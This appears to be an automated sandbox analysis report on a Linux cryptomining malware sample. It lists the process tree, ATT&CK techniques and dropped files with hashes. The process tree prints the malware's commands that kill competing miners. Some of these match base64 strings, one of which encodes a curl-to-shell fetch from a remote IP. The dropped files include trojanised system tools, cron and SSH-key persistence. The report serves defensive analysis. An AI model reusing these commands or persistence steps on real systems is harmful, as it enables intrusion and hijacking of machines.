  awk "{print \$2}"
  2⤵
  PID:1739
- /bin/grep
  grep xiaoyao
  2⤵
  PID:1738
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:1737
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1745
- - /usr/local/sbin/kill
    kill -9 1743
    3⤵
    PID:1746
- - /usr/local/bin/kill
    kill -9 1743
    3⤵
    PID:1746
- - /usr/sbin/kill
    kill -9 1743
    3⤵
    PID:1746
- - /usr/bin/kill
    kill -9 1743
    3⤵
    PID:1746
- - /sbin/kill
    kill -9 1743
    3⤵
    PID:1746
- - /bin/kill
    kill -9 1743
    3⤵
    PID:1746
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1744
- /bin/grep
  grep xiaoxue
  2⤵
  PID:1743
- /bin/ps
  ps auxf
  2⤵
  PID:1742
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:1751
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1750
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:1749
- /bin/grep
  grep 46.243.253.15
  2⤵
  PID:1748
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1752
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1758
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:1757
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1756
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:1755
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:1754
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1760
- /usr/bin/pgrep
  pgrep -f L2Jpbi9iYXN
  2⤵
  PID:1759
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1762
- /usr/bin/pgrep
  pgrep -f xzpauectgr
  2⤵
  PID:1761
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1764
- /usr/bin/pgrep
  pgrep -f slxfbkmxtd
  2⤵
  PID:1763
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1766
- /usr/bin/pgrep
  pgrep -f mixtape
  2⤵
  PID:1765
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1768
- /usr/bin/pgrep
  pgrep -f addnj
  2⤵
  PID:1767
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1770
- /usr/bin/pgrep
  pgrep -f 200.68.17.196
  2⤵
  PID:1769
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1772
- /usr/bin/pgrep
  pgrep -f IyEvYmluL3NoCgpzUG
  2⤵
  - Reads runtime system information
  PID:1771
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1774
- /usr/bin/pgrep
  pgrep -f KHdnZXQgLXFPLSBodHRw
  2⤵
  PID:1773
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1776
- /usr/bin/pgrep
  pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3
  2⤵
  - Reads runtime system information
  PID:1775
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1778
- /usr/bin/pgrep
  pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo
  2⤵
  PID:1777
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1780
- /usr/bin/pgrep
  pgrep -f mwyumwdbpq.conf
  2⤵
  - Reads CPU attributes
  PID:1779
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1782
- /usr/bin/pgrep
  pgrep -f honvbsasbf.conf
  2⤵
  PID:1781
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1784
- /usr/bin/pgrep
  pgrep -f mqdsflm.cf
  2⤵
  PID:1783
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1786
- /usr/bin/pgrep
  pgrep -f lower.sh
  2⤵
  PID:1785
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1788
- /usr/bin/pgrep
  pgrep -f ./ppp
  2⤵
  - Reads CPU attributes
  PID:1787
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1790
- /usr/bin/pgrep
  pgrep -f cryptonight
  2⤵
  PID:1789
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1792
- /usr/bin/pgrep
  pgrep -f ./seervceaess
  2⤵
  PID:1791
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1794
- /usr/bin/pgrep
  pgrep -f ./servceaess
  2⤵
  PID:1793
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1796
- /usr/bin/pgrep
  pgrep -f ./servceas
  2⤵
  PID:1795
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1798
- /usr/bin/pgrep
  pgrep -f ./servcesa
  2⤵
  PID:1797

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Software Deployment Tools

T1072

Persistence

Account Manipulation

T1098

SSH Authorized Keys

T1098.004

Boot or Logon Autostart Execution

T1547

Boot or Logon Initialization Scripts

T1037

RC Scripts

T1037.004

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Account Manipulation

T1098

SSH Authorized Keys

T1098.004

Boot or Logon Autostart Execution

T1547

Boot or Logon Initialization Scripts

T1037

RC Scripts

T1037.004

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

Adversary-in-the-Middle

T1557

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Software Deployment Tools

T1072

Collection

Adversary-in-the-Middle

T1557

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/bin/ps

Filesize
13B

MD5
3d47b8e895a71930bda5d4f3d8fc8589

SHA1
efbaf468b81abb6b465ca12f35fa067bae1b4f10

SHA256
be167c52e59f0a02ca6841074d9e73205b2f7898ad73d405c7b96f9efb440c36

SHA512
bd109ac68d85a8451187e31b8ec62dbc062d3fa2aab866928b094b64318912c7056f42ca363b01af74b1898f84d2675f3099d1aab72140b6ba932a16257aa5eb

Download Submit
/bin/ps

Filesize
52B

MD5
f668da8f0525cbe5a545869cb5776913

SHA1
996e6afed4498ff8a92a64330de018141af102c9

SHA256
db7a08cba996d62b1fe07727ba58b98d7b59778bd7227c9b7fd69bc587d2557f

SHA512
f918ba58e9af19704344c92ec356d215080f47d66b175f3d712d31e54e1b9e4e46daeb0556d82b0722ae01b8cfe456f08021e73b053ced6326735e1d0b73c700

Download Submit
/bin/pstree

Filesize
56B

MD5
896f6d504f181bd883a90b84069bcf70

SHA1
86fd682d1932d9e14461796e5f0fe776b8ce9d5c

SHA256
b6eec955fd5b0e9ddf43ef55b7fe74075cc1a935ab896d5cd0a55429ef0d6d25

SHA512
1f705ceead76868a79abb7ea42efad35e37b95421bfc81ce4540e4beeb7cbc0ccadfaae85794b6945c93304da9948d9d63504f9377ca3e92b874cc3f691d3c1a

Download Submit
/bin/top

Filesize
53B

MD5
6956a4d6a2444151c11a73517215cb34

SHA1
b279ad496f640f44418aa7e5e27a4d458bddb7fb

SHA256
561941bdd6305a389e688a1214acd9163478301738158f13349ea403dfae300c

SHA512
ee1a27243159cf9aa99ed0ff79ae1f6d66c698f668e0c233544f1a79aab5bb8ca6edb051d907aef8b50ff85f39aa41b21e951476c3a53b6a85a7a06adc28ed8d

Download Submit
/etc/cron.d/zzh

Filesize
53B

MD5
3a615a3d1952b1e2c0cb584bd253f7f9

SHA1
79465a5e611f19f140f169ac5bc3a9ab382696ef

SHA256
ff1d557b85a902fbe4d2d0b0f3e79307f1f7e6dc36c537a824e920c5e8ece2de

SHA512
8819cd4ef33fe59b8618ac7a2f116169b2effeb87f2353b674ef08c8297dbbda75112c5dd882c60b05c9cedeab0aa3dd79e06923b2a2db0cad8a3ec2b6c5532e

Download Submit
/etc/crontab

Filesize
50B

MD5
b2ecca8d419b5c3fa2ee7621efa75eb7

SHA1
3adc58bd314dea94eebfd1582ffc8bbbb5cfb34e

SHA256
e15357c9d6df46a6b43036e8f646311f88019e587b8d55a8aecfa438cd971545

SHA512
c6a7d05b7f615de3946055be8a4995c0fb8c670fe53c8a8dcba98f32c2ec4cb92a93524aebaca97c9b6e8696b71bdc2114d6ec303bff4ec288745bae15522e69

Download Submit
/etc/zzh

Filesize
2.5MB

MD5
c6d1e3293c17bddaaca25410de6c49fe

SHA1
82a412fcb51a87887e55c8798d111e2b5fd5b96d

SHA256
7dff9504960b180ba4328b80756d0849c690e64fc6879ede5094b6273fe2cd5a

SHA512
6134ca54020e037aca25c6d6e76ef29f73cc8e55058d90882dba38b72e586e73d94b84e4c167661a960b68eb679c408adcae60ca43fa4de9e095d7b2869b6584

Download Submit
/etc/zzhs

Filesize
9B

MD5
970d39f8690eff0fe573e7bcf51bda9b

SHA1
46f8f835d3d3d41f063d0e8346260bb622b01a3f

SHA256
7e3735835710cbbb54a0bee4a323c83c54cb1f4f60463b9cf88006946fe2b9a5

SHA512
24952be3e8e47ffb4ee83d55f513edf041f6c4e420e2f52bdbdf0daee4c5735ad3ee5ed863f95ffa931a70d551590a7fe6ae67dc22f32060793e2525e4b56cd0

Download Submit
/etc/zzhs

Filesize
2B

MD5
b026324c6904b2a9cb4b88d6d61c81d1

SHA1
e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e

SHA256
4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865

SHA512
3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

Download Submit
/root/.ssh/authorized_keys

Filesize
1B

MD5
68b329da9893e34099c7d8ad5cb9c940

SHA1
adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

SHA256
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

SHA512
be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Download Submit
/root/.ssh/authorized_keys

Filesize
557B

MD5
12bf68ad9999dcbc8bd1d9a728d600aa

SHA1
7f302d2df5e075f879586cb0ab1dcc0b0870cc98

SHA256
cfc3a74939edac785d66664757b3c877a7e5f4fae29b3a5bdf8b55e79573dfb5

SHA512
ef6a8c50fd411622eefae30bfcc962368f355ec897b0136b2290784344ce735c3b3d51feda679e3c42ab524197d6515f1f8699e17598171a1b888b0fbe5229e7

Download Submit
/usr/bin/irqbalanced

Filesize
2B

MD5
6d7fce9fee471194aa8b5b6e47267f03

SHA1
a3db5c13ff90a36963278c6a39e4ee3c22e2a436

SHA256
1121cfccd5913f0a63fec40a6ffd44ea64f9dc135c66634ba001d10bcf4302a2

SHA512
2b59d179d9815994f687383a886ea34109889756efca5ab27318cc67ce2a21261d12fa6fee6b8c716f72214ead55ee0d789d6c35cff977d40ef5728ba9188a80

Download Submit
/usr/bin/kswaped

Filesize
2B

MD5
26ab0db90d72e28ad0ba1e22ee510510

SHA1
7448d8798a4380162d4b56f9b452e2f6f9e24e7a

SHA256
53c234e5e8472b6ac51c1ae1cab3fe06fad053beb8ebfd8977b010655bfdd3c3

SHA512
63e22ec2fbeebabf005e58fbfb0eee607c4aa417045a68a0cc63767b048e3559268d35e72f367d3b2dbd5dbddf12fc4397762ba149260b3795a0391713bddcd7

Download Submit
/usr/bin/pamdicks

Filesize
2B

MD5
9ae0ea9e3c9c6e1b9b6252c8395efdc1

SHA1
ccf271b7830882da1791852baeca1737fcbe4b90

SHA256
06e9d52c1720fca412803e3b07c4b228ff113e303f4c7ab94665319d832bbfb7

SHA512
f3d08a4bfef201adbe711e8805f96ff13909719107dcac81f4fc9185040d59d8d573344a0707e697f8b4f0212e0d79f3bdd6b86688dd8c54019b9d93c937f3ca

Download Submit
/usr/bin/rctlcli

Filesize
2B

MD5
48a24b70a0b376535542b996af517398

SHA1
9c6b057a2b9d96a4067a749ee3b3b0158d390cf1

SHA256
7de1555df0c2700329e815b93b32c571c3ea54dc967b89e81ab73b9972b72d1d

SHA512
db545c410fd0c8ede533d5b0666cd2798ba380bd25b655619cd5fd3a33a255569b3ccc319bfdef3322d8392d894d15c2e6aa2d53346e6ac54eaf5d627bfe6a9a

Download Submit
/usr/bin/systemd-network

Filesize
2B

MD5
1dcca23355272056f04fe8bf20edfce0

SHA1
5d9474c0309b7ca09a182d888f73b37a8fe1362c

SHA256
f0b5c2c2211c8d67ed15e75e656c7862d086e9245420892a7de62cd9ec582a06

SHA512
29b3573989378848e91465abb8bb12aaad1c40f01ddba6ce5dce4de88d61d49621cd4272bc6f889cd469e9490040b412eb0a237cf2cd49c637da1d5de5903f3d

Download Submit